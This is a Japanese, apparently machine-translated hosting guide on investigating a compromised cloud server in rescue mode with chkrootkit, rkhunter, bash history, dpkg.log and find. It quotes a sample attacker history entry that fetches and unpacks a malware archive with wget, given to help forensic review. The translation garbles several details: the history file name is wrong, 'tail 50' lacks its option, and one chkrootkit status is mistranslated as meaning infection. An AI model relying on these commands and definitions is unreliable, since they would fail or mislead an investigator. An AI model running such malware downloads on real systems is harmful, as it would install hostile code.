記事「セキュリティ侵害の確認:バックドアと侵入者」では、サーバーを侵害した侵入者を特定するために必要な情報を収集するための基本的な手法をいくつか学びました。この記事では、クラウドコントロールパネルのレスキューモードの使用方法について説明します。 システムを詳しく調べます。レスキューモードを使用すると、サーバーがどのように侵害されたかをよりよく理解し、データをバックアップする前に侵害されていないファイルを特定できます。
Cloud Serverのオペレーティングシステムも危険にさらされている可能性があるため、信頼することはできません。侵入者が「ls」、「find」、「netstat」などのバイナリを侵害した可能性があるため、それらの出力が誤解を招く可能性があります。したがって、侵害を安全に調査するには、別のオペレーティングシステム環境を使用する必要があります。
これを行うには、クラウドコントロールパネルにあるレスキューモード機能を使用します。手順と詳細については、レスキューモードを参照してください。
サーバーがレスキューモードになっているときに、次のアクションを実行して、侵害の原因を特定できます。
次のツールをインストールして使用し、システムでルートキットをスキャンすることをお勧めします。
chkrootkitを使用してルートキットをスキャンします
chkrootkit 侵害されたバイナリシステムで既知の署名を探します。たとえば、一部の侵害されたバージョンの ps 「/dev / ptyp」があります それらの中に」。 chkrootkitをインストールすることをお勧めします ソースからコンパイルするのではなく、パッケージマネージャーを使用します。 chkrootkitの使用に関するその他のオプションと情報については、http://www.chkrootkit.org/READMEを参照してください。
-
インストールするには、次のコマンドを実行します。
apt-get install chkrootkit -
chkrootkitを実行します クラウドサーバーのマウントされたファイルシステムに対して:chkrootkit -r /mnt/demo
次のメッセージはchkrootkitによって出力されます テスト中:
-
INFECTED-テストにより、既知のルートキットによって変更された可能性のあるコマンドが特定されました -
感染していない-テストで既知のルートキットシグネチャが見つかりませんでした -
テストされていません-テストは実行されませんでしたこれは、次の状況で発生する可能性があります。
- テストはOS固有です
- テストは利用できない外部プログラムに依存します
- いくつかの特定のコマンドラインオプションが提供されています(たとえば、
-r)
-
見つかりません -テストするコマンドが見つかりません -
脆弱ですが無効です-コマンドが感染しています
chkrootkitの使用に関するその他のオプションと情報について 、https://www.chkrootkit.org/READMEを参照してください。
rkhunterでルートキットをスキャンする
ルートキットハンター( rkhunter )既知のルートキットのデータベースに対してシステムをチェックします。また、他のシステムファイルをチェックして、それらが期待されるプロパティと値と一致していることを確認することもできます。
-
ターミナルアプリケーションにログインし、
ソースに変更します ディレクトリ:cd ~/sources -
rkhunterの最新バージョンをダウンロードする SourceForgeダウンロードエリアから:https://sourceforge.net/projects/rkhunter/files/ -
rkhunterをインストールした後 、/ mnt / demoに対して実行します 。rkhunter -c -r /mnt/demo
rkhunter テスト中に、ファイルが予想されるデフォルトから逸脱した場所を示す警告が生成されます。テストに続いて、ログをチェックして、警告を生成したファイルに関する詳細情報を確認できます。 rkhunterの使用に関するその他のオプションと情報 、https://rkhunter.cvs.sourceforge.net/viewvc/rkhunter/rkhunter/files/READMEを参照してください。
Cloud Serverのセキュリティがどのように侵害されたかを知るには、CloudServerが侵害される前にどのユーザーがコマンドを実行したかを確認してください。
.bashhistory ファイルには、Bashシェルで使用される最後のコマンドが含まれています。 .bashhistoryを確認する必要があります。 各ユーザーのホームディレクトリにあるファイル。最も重要な.bashhistory ファイルはrootに属するファイルです: /root/.bashhistory 。
侵害されたクラウドサーバーには、次のようなエントリが含まれている可能性があります。
wget https://malware.tar.gz
gunzip malware.tar.gz
tar xf malware.tar
パッケージングシステムへのすべての変更は、 /var/log/dpkg.logに保存されます。 onDebianベースのディストリビューション。このファイルをチェックして、パッケージのインストールや削除、バスの変更などの疑わしいアクティビティがないか確認してください。
次のコマンドを実行して、 dpkg.logの最後の50行を表示します。 ファイル:
tail 50 /mnt/demo/var/log/dpkg.log
find コマンドは通常、特定のパターンのファイル名を検索するために使用されますが、特定の期間内に変更またはアクセスされたファイルを検索するためにも使用できます。
たとえば、すべてのファイルは / etcにあります。 次のように、過去2日以内に変更されたrootが所有しています:
find /mnt/demo/etc -user root -mtime -2
使用可能なオプションは次のとおりです。
-atime: when the file was last accessed
-ctime: when the file's permissions were last changed
-mtime: when the file's data was last modified
前の例の「2」の前のマイナス記号に注意してください。 findの「時間」オプション コマンドは24時間単位で表され、数字の前に使用されている記号は未満を示す場合があります またはより大きい したがって、「-2」は、過去2日以内に変更されたファイルを検索することを意味します。 2日以上前に変更されたファイルを検索する場合は、 +2を使用します :
find /mnt/demo/etc -user root -mtime +2
atimeのバージョンもあります 、 ctime 、および mtime 時間を分単位で測定する引数:
-amin: when (in minutes) the file was last accessed
-cmin: when (in minutes) the file's permissions were last changed
-mmin: when (in minutes) the file's data was last modified
demoが所有するクラウドサーバー内のすべてのファイルを検索します 過去5分以内にアクセスされたユーザー:
find /mnt/demo -user demo -amin -5
次のfindのリスト 侵害されたクラウドサーバーの調査を調査する際に、コマンドオプションが役立つ場合があります。
-nouser: shows output not associated with an existing userid
-nogroup: shows output not associated with an existing groupid
-links n: file has n links
-newer file: file was modified more recently than file
-perm mode: file has mode permissions
/ tmp で疑わしいファイルをチェックすることで、侵入者を見つけることができます。 、 / var / tmp 、 / dev / shm 、 / var / spool / samba 、 / var / spool / squid 、および / var / spool / cron 。
/ var / logでログファイルを確認することもできます ディレクトリ。例: auth.log IPアドレスを含むユーザーログイン情報を記録します。
セキュリティ侵害のチェック:バックドアと侵入者では、バックドアを発見し、クラウドサーバーへの侵入者を追跡するために使用するいくつかのテクニックを学びました。これにより、侵害につながる状況や間違いを回避し、将来の侵害の可能性を最小限に抑えることができます。この記事では、レスキューモードでクラウドサーバーを調査する方法を学びました。
ウイルス、ファイルの破損、マシンの障害、またはその他の予期しない事故が原因であるかどうかにかかわらず、データ損失の可能性は現実的です。このような損失が発生する可能性のある中断を回避するには、ファイルを定期的にバックアップしてください。ファイルを保護するのに役立ついくつかのオプションは次のとおりです。
- Rackspace Cloud Backupは、クラウドサーバーのお客様に最適です。クラウドサーバーと完全に統合されており、イメージサーバー全体のバックアップに代わるファイルベースのバックアップです。
- 自分で行うことを好む人は、rsyncを使用してファイルをバックアップするを参照してください。